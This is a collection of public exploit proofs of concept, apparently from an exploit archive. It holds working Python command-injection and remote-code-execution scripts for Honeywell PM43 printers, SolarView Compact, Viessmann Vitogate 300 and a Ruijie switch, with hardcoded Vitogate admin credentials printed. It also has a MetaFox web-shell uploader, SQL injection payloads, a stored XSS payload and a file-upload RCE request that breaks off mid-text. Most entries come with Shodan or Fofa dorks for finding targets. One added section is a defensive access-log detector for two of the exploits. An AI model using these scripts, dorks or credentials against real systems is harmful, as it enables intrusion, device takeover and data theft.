<pre><code>#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.title:PM43 , PM43<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Firmware Version: versions prior to P10.19.050004<br />#- Tested on: P10.17.019667<br />#- CVE : CVE-2023-3710<br /><br /><br />import requests<br />import argparse<br /><br />BLUE = '\033[94m'<br />YELLOW = '\033[93m'<br />RESET = '\033[0m'<br /><br />def banner():<br />    banner = """<br />    ╔════════════════════════════════════════════════╗<br />      CVE-2023-3710<br />      Command Injection in Honeywell PM43 Printers<br />      Author: ByteHunter<br />    ╚════════════════════════════════════════════════╝<br />    """<br />    print(YELLOW + banner + RESET)<br /><br /><br />def run_command(url, command):<br />    full_url = f"{url}/loadfile.lp?pageid=Configure"<br />    payload = {<br />        'username': f'hunt\n{command}\n',<br />        'userpassword': 'admin12345admin!!'<br />    }<br />    try:<br />        response = requests.post(full_url, data=payload, verify=False)<br />        response_text = response.text<br />        # whatever the device returns before its HTML page is the command output<br />        html_start_index = response_text.find('<html>')<br />        if html_start_index != -1:<br />            return response_text[:html_start_index]<br />        else:<br />            return response_text<br />    except requests.exceptions.RequestException as e:<br />        return f"Error: {e}"<br /><br />def main():<br />    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')<br />    parser.add_argument('--url', dest='url', help='Target URL', required=True)<br />    parser.add_argument('--run', dest='command', help='Command to execute', required=True)<br /><br />    args = parser.parse_args()<br /><br />    response = run_command(args.url, args.command)<br />    print(f"{BLUE}{response}{RESET}")<br /><br />if __name__ == "__main__":<br />    banner()<br />    main()<br /></code></pre>
<pre><code>#- Exploit Title: SolarView Compact 6.00 - Command Injection<br />#- Shodan Dork: http.html:"solarview compact"<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Version: 6.00<br />#- Tested on: 6.00<br />#- CVE : CVE-2023-23333<br /><br /><br />import argparse<br />import requests<br /><br />def vuln_check(ip_address, port):<br />    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"<br />    response = requests.get(url)<br />    if response.status_code == 200:<br />        output = response.text<br />        if "root" in output:<br />            print("Vulnerability detected: Command Injection possible.")<br />            print(f"passwd file content:\n{output}")<br />        else:<br />            print("No vulnerability detected.")<br />    else:<br />        print("Error: Unable to fetch response.")<br /><br />def main():<br />    parser = argparse.ArgumentParser(description="SolarView Compact Command Injection")<br />    parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)<br />    parser.add_argument("-p", "--port", help="Port of the target device (default: 80)", default=80, type=int)<br />    args = parser.parse_args()<br /><br />    ip_address = args.ip<br />    port = args.port<br />    vuln_check(ip_address, port)<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
<pre><code>#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.title:'Vitogate 300'<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Version: versions up to 2.1.3.0<br />#- Tested on: 2.1.1.0<br />#- CVE : CVE-2023-5702 & CVE-2023-5222<br /><br /><br />import argparse<br />import requests<br /><br />def banner():<br />    banner = """<br />    ╔═══════════════════════════════════╗<br />      CVE-2023-5702<br />      Vitogate 300 RCE<br />      Author: ByteHunter<br />    ╚═══════════════════════════════════╝<br />    """<br /><br />    print(banner)<br /><br /><br />def send_post_request(target_ip, command, target_port):<br />    payload = {<br />        "method": "put",<br />        "form": "form-4-7",<br />        "session": "",<br />        "params": {<br />            "ipaddr": f"1;{command}"<br />        }<br />    }<br /><br />    # Content-Length is computed by requests from the serialised JSON body<br />    headers = {<br />        "Host": target_ip,<br />        "Content-Type": "application/json"<br />    }<br /><br />    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"<br /><br />    response = requests.post(url, json=payload, headers=headers)<br /><br />    if response.status_code == 200:<br />        print("Result:")<br />        print(response.text)<br />    else:<br />        print(f"Request failed! status code: {response.status_code}")<br /><br />def main():<br />    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")<br />    parser.add_argument("--target", required=False, help="Target IP address")<br />    parser.add_argument("--port", required=False, help="Target port", default="80")<br />    parser.add_argument("--command", required=False, help="Command")<br />    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")<br /><br />    args = parser.parse_args()<br /><br />    if args.creds:<br />        print("Vitogate 300 hardcoded administrative accounts credentials")<br />        print("Username: vitomaster, Password: viessmann1917")<br />        print("Username: vitogate, Password: viessmann")<br />    else:<br />        target_ip = args.target<br />        target_port = args.port<br />        command = args.command<br /><br />        if not (target_ip and command):<br />            print("Both --target and --command options are required.\nOr use the --creds option to see the hardcoded credentials.")<br />            return<br /><br />        send_post_request(target_ip, command, target_port)<br /><br />if __name__ == "__main__":<br />    banner()<br />    main()<br /></code></pre>
<pre><code>#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.html_hash:-1402735717<br />#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"<br />#- Exploit Author: ByteHunter<br />#- Email: 0xByteHunter@proton.me<br />#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)<br />#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)<br /><br />import http.client<br />import argparse<br /><br />def send_request(ip, port, command):<br />    headers = {<br />        "Host": f"{ip}:{port}",<br />        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",<br />        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br />        "Accept-Language": "en-US,en;q=0.5",<br />        "Accept-Encoding": "gzip, deflate, br",<br />        "DNT": "1",<br />        "Connection": "close",<br />        "Upgrade-Insecure-Requests": "1",<br />        "Cmdnum": "1",<br />        "Confirm1": "n",<br />        "Content-Length": "0",<br />        "Command1": command<br />    }<br /><br />    try:<br />        connection = http.client.HTTPConnection(f"{ip}:{port}")<br />        connection.request("GET", "/EXCU_SHELL", headers=headers)<br />        response = connection.getresponse()<br /><br />        print(f"Status Code: {response.status}")<br />        print(response.read().decode('utf-8'))<br />        connection.close()<br /><br />    except Exception as e:<br />        print(f"Request failed: {e}")<br /><br />if __name__ == "__main__":<br />    parser = argparse.ArgumentParser(description='Proof of concept for Ruijie switch RCE')<br />    parser.add_argument('--ip', help='Target IP address', required=True)<br />    parser.add_argument('--port', help='Port', required=True)<br />    parser.add_argument('--cmd', help='Command', required=True)<br />    args = parser.parse_args()<br /><br />    ip = args.ip<br />    port = args.port<br />    command = args.cmd<br /><br />    send_request(ip, port, command)<br /></code></pre>
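The SolarView Compact and Ruijie PSG-5124 PoCs above both carry the injected command in the HTTP request line (the `file` query parameter of `downloader.php`, and the `/EXCU_SHELL` path), so ordinary web server access logs retain a trace of them even where the request body is not logged. The following detector is an added example written for this page, not code from any of the PoCs or their authors: it parses Combined Log Format lines and flags those two request-line patterns. The log lines, rule names and function names are constructed for the example; the Ruijie `Cmdnum`/`Command1` headers are not in access logs and would need a full request capture to match on.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines in Combined Log Format (not real traffic).
# Lines 2 and 3 mimic the request lines the SolarView and Ruijie PoCs above emit.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:14:02:11 +0000] "GET /downloader.php?file=report.zip HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:14:02:15 +0000] "GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip HTTP/1.1" 200 1830 "-" "python-requests/2.31.0"
198.51.100.4 - - [10/Mar/2024:14:03:40 +0000] "GET /EXCU_SHELL HTTP/1.1" 200 210 "-" "Mozilla/5.0"
198.51.100.5 - - [10/Mar/2024:14:04:02 +0000] "GET /index.htm HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Combined Log Format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shell metacharacters (after percent-decoding) that never belong in a file name parameter.
SHELL_META_RE = re.compile(r'[;|&`$\x00]')


def parse_line(line):
    """Parse one CLF line into a dict of named fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(query):
    """Split a raw query string on '&' only (urllib's parse_qs may also split on ';',
    which would hide the very character we look for) and percent-decode both sides."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(entry):
    """Return the names of the detection rules that fire for one parsed entry."""
    hits = []
    parts = urlsplit(entry["target"])
    # Rule 1: the Ruijie PoC drives the /EXCU_SHELL handler; a switch's management
    # UI has no legitimate reason to receive this request from the network.
    if parts.path.upper() == "/EXCU_SHELL":
        hits.append("ruijie-excu-shell")
    # Rule 2: the SolarView PoC passes a shell pipeline in the 'file' parameter of
    # downloader.php; a genuine download request carries a plain file name.
    if parts.path.endswith("/downloader.php"):
        for value in query_params(parts.query).get("file", []):
            if SHELL_META_RE.search(value):
                hits.append("solarview-downloader-cmdinj")
                break
    return hits


def scan(log_text):
    """Scan raw log text and return (client ip, timestamp, [rules]) for every hit."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], entry["ts"], hits))
    return findings


if __name__ == "__main__":
    for ip, ts, rules in scan(SAMPLE_LOG):
        print(f"{ts} {ip} -> {', '.join(rules)}")
```

Run against the embedded sample the scan reports the second and third lines only. Percent-decoding before the metacharacter check matters: the `%00` and `%20` in the SolarView request line are harmless as text but decode to the NUL and space that make the injected pipeline work, and an encoded `%3B` would otherwise slip past a literal `;` match.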
<pre><code>+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1<br />+ **Date:** 2023-26-12<br />+ **Exploit Author:** Hamdi Sevben<br />+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/<br />+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip<br />+ **Version:** 1.0<br />+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53<br />+ **CVE:** CVE-2023-7137<br /><br />## References:<br />+ **CVE-2023-7137:** https://vuldb.com/?id.249140<br />+ https://www.cve.org/CVERecord?id=CVE-2023-7137<br />+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137<br />+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137<br /><br />## Description:<br />Client Details System 1.0 allows SQL Injection via the 'uemail' parameter of "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit further vulnerabilities in the underlying database.<br /><br />## Proof of Concept:<br />+ Go to the User Login page: "http://localhost/clientdetails/"<br />+ Fill in the email and password.<br />+ Intercept the request with Burp Suite and send it to Repeater.<br />+ Copy and paste the request into a file named "r.txt".<br />+ Captured Burp request:<br />```<br />POST /clientdetails/ HTTP/1.1<br />Host: localhost<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-us,en;q=0.5<br />Cache-Control: no-cache<br />Content-Length: 317<br />Content-Type: application/x-www-form-urlencoded<br />Referer: http://localhost/clientdetails/<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36<br /><br />uemail=user@mail.com&login=LOG+IN&password=P@ass123<br />```<br /><br />+ Use sqlmap to exploit. In sqlmap, use the 'uemail' parameter to dump the database.<br />```<br />python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent --tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db<br />```<br /><br />```<br />---<br />Parameter: uemail (POST)<br />    Type: boolean-based blind<br />    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br />    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123<br /><br />    Type: error-based<br />    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br />    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123<br /><br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123<br /><br />    Type: UNION query<br />    Title: Generic UNION query (NULL) - 7 columns<br />    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123<br />---<br />[14:58:11] [INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2.4.53, PHP, PHP 8.1.6<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[14:58:11] [INFO] fetching current database<br />current database: 'loginsystem'<br />```<br /><br />+ current database: `loginsystem`<br />![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># Exploit Title: MetaFox Remote Shell Upload<br /># Google Dork: "Social network for niche communities"<br /># Exploit Author: The Joker<br /># Vendor Homepage: https://www.phpfox.com<br /># Version: <= 5.1.8<br /><br />import json<br />import requests<br />import sys<br /><br />if len(sys.argv) != 4:<br />    sys.exit("Usage: %s " % sys.argv[0])<br /><br />requests.packages.urllib3.disable_warnings()<br /><br /># authenticate and obtain a bearer token<br />endpoint = sys.argv[1] + "/api/v1/user/login"<br />response = requests.post(endpoint, json={"username": sys.argv[2], "password": sys.argv[3]}, verify=False)<br />json_response = json.loads(response.text)<br />if "access_token" not in json_response:<br />    sys.exit("Login failed!")<br />print("Login success! Uploading shell")<br />token = json_response["access_token"]<br /><br /># upload the file through the authenticated files API<br />endpoint = sys.argv[1] + "/api/v1/files"<br />files = {"file[0]": ("wtf.php", "")}<br />response = requests.post(endpoint, files=files, headers={"Authorization": "Bearer " + token}, verify=False)<br />json_response = json.loads(response.text)<br />if "data" not in json_response or "url" not in json_response["data"][0]:<br />    sys.exit("Upload failed!")<br />shell_url = json_response["data"][0]["url"]<br />print("Shell uploaded at %s\n" % shell_url)<br /><br />while True:<br />    command = input("$ ")<br />    response = requests.post(shell_url, data={"command": command}, verify=False)<br />    print(response.text)<br /></code></pre>
<pre><code># Exploit Title: [Cisco Firepower Management Center]<br /># Google Dork: [non]<br /># Date: [12/06/2023]<br /># Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)<br /># Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]<br /># CVE : [CVE-2023-20048]<br /><br />import requests<br />import json<br /><br /># set the variables for the URL, username, and password for the FMC web services interface<br />fmc_url = "https://fmc.example.com"<br />fmc_user = "admin"<br />fmc_pass = "cisco123"<br /><br /># create a requests session to handle cookies and certificate verification<br />session = requests.Session()<br />session.verify = False<br /><br /># send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token<br />token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"<br />response = session.post(token_url, auth=(fmc_user, fmc_pass))<br /><br /># check the response status and extract the access token and refresh token from the response headers<br /># set the access token as the authorization header for the subsequent requests<br />try:<br />    if response.status_code == 200:<br />        access_token = response.headers["X-auth-access-token"]<br />        refresh_token = response.headers["X-auth-refresh-token"]<br />        session.headers["Authorization"] = access_token<br />    else:<br />        print("Failed to get tokens, status code: " + str(response.status_code))<br />        exit()<br />except Exception as e:<br />    print(e)<br />    exit()<br /><br /># set the variable for the domain id<br /># change this to your domain id<br />domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"<br /><br /># send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC<br />devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"<br />response = session.get(devices_url)<br /><br /># check the response status and extract the data as a json object<br />try:<br />    if response.status_code == 200:<br />        data = response.json()<br />    else:<br />        print("Failed to get devices, status code: " + str(response.status_code))<br />        exit()<br />except Exception as e:<br />    print(e)<br />    exit()<br /><br /># parse the data to get the list of device names and URLs<br />devices = []<br />for item in data["items"]:<br />    device_name = item["name"]<br />    device_url = item["links"]["self"]<br />    devices.append((device_name, device_url))<br /><br /># loop through the list of devices and send a GET request to the URL of each device to get the device details<br />for device in devices:<br />    device_name, device_url = device<br />    response = session.get(device_url)<br /><br />    # check the response status and extract the data as a json object<br />    try:<br />        if response.status_code == 200:<br />            data = response.json()<br />        else:<br />            print("Failed to get device details, status code: " + str(response.status_code))<br />            continue<br />    except Exception as e:<br />        print(e)<br />        continue<br /><br />    # parse the data to get the device type, software version, and configuration URL<br />    device_type = data["type"]<br />    device_version = data["metadata"]["softwareVersion"]<br />    config_url = data["metadata"]["configURL"]<br /><br />    # check if the device type is FTD and the software version is vulnerable to CVE-2023-20048<br />    # use the values from the affected products section in the security advisory<br />    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:<br />        print("Device " + device_name + " is vulnerable to CVE-2023-20048")<br /><br />        # create a list of commands that you want to execute on the device<br />        commands = ["show version", "show running-config", "show interfaces"]<br />        device_id = device_url.split("/")[-1]<br /><br />        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device<br />        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute<br />        for command in commands:<br />            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command<br />            response = session.post(command_url)<br /><br />            # check the response status and extract the data as a json object<br />            try:<br />                if response.status_code == 200:<br />                    data = response.json()<br />                else:<br />                    print("Failed to execute command, status code: " + str(response.status_code))<br />                    continue<br />            except Exception as e:<br />                print(e)<br />                continue<br /><br />            # parse the data to get the result of the command execution and print it<br />            result = data["result"]<br />            print("Command: " + command)<br />            print("Result: " + result)<br /><br />    else:<br />        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")<br /></code></pre>
<pre><code>Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting<br />Date: 06-Oct-2023<br />Exploit Author: Shahzaib Ali Khan<br />Vendor Homepage: https://snipeitapp.com<br />Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1<br />Version: 6.2.1<br />Tested on: Windows 11 22H2 and Ubuntu 20.04<br />CVE: CVE-2023-5452<br /><br />Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting<br />(XSS) vulnerability that allows attackers to execute JavaScript. The<br />location endpoint was vulnerable.<br /><br />Steps to Reproduce:<br /><br />1. Login as a standard user [non-admin] > Asset page > List All<br />2. Click to open any asset > Edit Asset<br />3. Create a new location and add the payload:<br /><script>alert(document.cookie)</script><br />4. Now login as any other non-admin or admin user > Asset page > List All<br />5. Open the same asset whose location you changed; the payload<br />will be executed.<br /><br />POC Request:<br /><br />POST /api/v1/locations HTTP/1.1<br />Host: localhost<br />Content-Length: 118<br />Accept: */*<br />X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Origin: http://localhost<br />Referer: http://localhost/hardware/196/edit<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;<br />assetsListingTable.bs.table.cardView=false; laravel_token=<br />eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3<br 
/>ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM<br />d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0<br />01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;<br />XSRF-TOKEN=<br />eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH<br />FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5<br />MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D<br />Connection: close<br /><br />name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=<br /><br /><br /><br />Thanks,<br />Shahzaib Ali Khan<br /></code></pre>
<pre><code>## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using<br />## Author: nu11secur1ty<br />## Date: 03/13/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br />## Description:<br />The upload function and the id=cimg parameter do not sanitize input correctly!<br />The attacker can upload any PHP file and execute it directly on<br />the server!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```http<br />POST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Content-Length: 6318<br />sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypV7nBYU4nAonvWel<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/mobile_store/admin/?page=system_info<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dg<br />Connection: close<br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="name"<br /><br />Mobile Store Management System - PHP<br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="short_name"<br /><br />MSMS-PHP<br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="about_us"<br /><br /><p style="text-align: center; margin-right: 0px; 
margin-bottom: 0px;<br />margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:<br />70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:<br />0px; clear: both; border-top: 0px; height: 1px; background-image:<br />linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),<br />rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:<br />0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px<br />-160px; padding: 0px; position: sticky; top: 20px; width: 160px;<br />height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);<br />font-family: "Open Sans", Arial, sans-serif; font-size: 14px;<br />background-color: rgb(255, 255, 255);"></div><div id="bannerR"<br />style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;<br />top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,<br />0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;<br />background-color: rgb(255, 255, 255);"></div><div class="boxed"<br />style="margin: 10px 28.7969px; padding: 0px; clear: both; color:<br />rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:<br />14px; text-align: center; background-color: rgb(255, 255, 255);"><div<br />id="lipsum" style="margin: 0px; padding: 0px; text-align:<br />justify;"></div></div></div><p style="margin-right: 0px;<br />margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum<br />dolor sit amet, consectetur adipiscing elit. Nullam non ultrices<br />tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas<br />iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit<br />vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin<br />lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et<br />malesuada fames ac ante ipsum primis in faucibus. Pellentesque<br />habitant morbi tristique senectus et netus et malesuada fames ac<br />turpis egestas. 
Praesent eleifend interdum est, at gravida erat<br />molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur<br />et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus<br />porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus<br />sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at<br />lacus vehicula, aliquam purus quis, pharetra lorem.</p><p<br />style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;<br />padding: 0px;">Proin consectetur massa ut quam molestie porta. Donec<br />sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent<br />per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar<br />ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu<br />blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend<br />id, aliquet ut libero. Nunc scelerisque vulputate turpis quis<br />volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum<br />imperdiet, nulla vitae pharetra pretium, magna felis placerat libero,<br />quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper<br />cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien<br />consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae<br />tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,<br />id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;<br />margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id ante<br />vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat<br />turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus<br />pulvinar, eros id ultricies mollis, lectus velit viverra mi, at<br />venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh<br />felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur<br />dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in<br />convallis nisi. 
Curabitur faucibus interdum massa, eu facilisis ligula<br />pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p<br />style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;<br />padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis id<br />cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit<br />ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non<br />lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at<br />pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,<br />vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in<br />tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis<br />dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque<br />mauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;<br />margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quis<br />imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus<br />lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis 